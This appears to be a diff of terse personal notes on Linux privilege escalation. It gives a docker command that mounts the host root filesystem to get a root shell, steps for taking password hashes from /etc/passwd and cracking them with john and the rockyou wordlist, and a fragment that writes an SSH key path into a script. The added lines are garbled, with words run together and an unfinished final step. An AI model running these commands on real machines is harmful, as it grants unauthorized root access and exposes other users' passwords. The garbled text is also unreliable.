Linux: #Privilege_Escalation_with_Intresting_Groups

 -cat /proc/version for linux version

-• run docker run -v /:/mnt --rm -it $IMAGE chroot /mnt bash to get root
+docker run -v /:/mnt --rm -it $IMAGE chroot /mnt bashto get root

-• You can crack other users password with john ,go to /etc/passwd get user name and hash (eg Adam:$hash), save it into a file ,then john it (john --wordlist=/usr/share/wordlists/rockyou.txt hash)
+/etc/passwdget user name and hash (eg Adam:$hash), save it into a file ,then john it (john --wordlist=/usr/share/wordlists/rockyou.txt hash)if

 1 - echo "touch /home/user/.ssh/id_rsa" > helloworld.sh (if .ssh folder exist, if not then ,create it)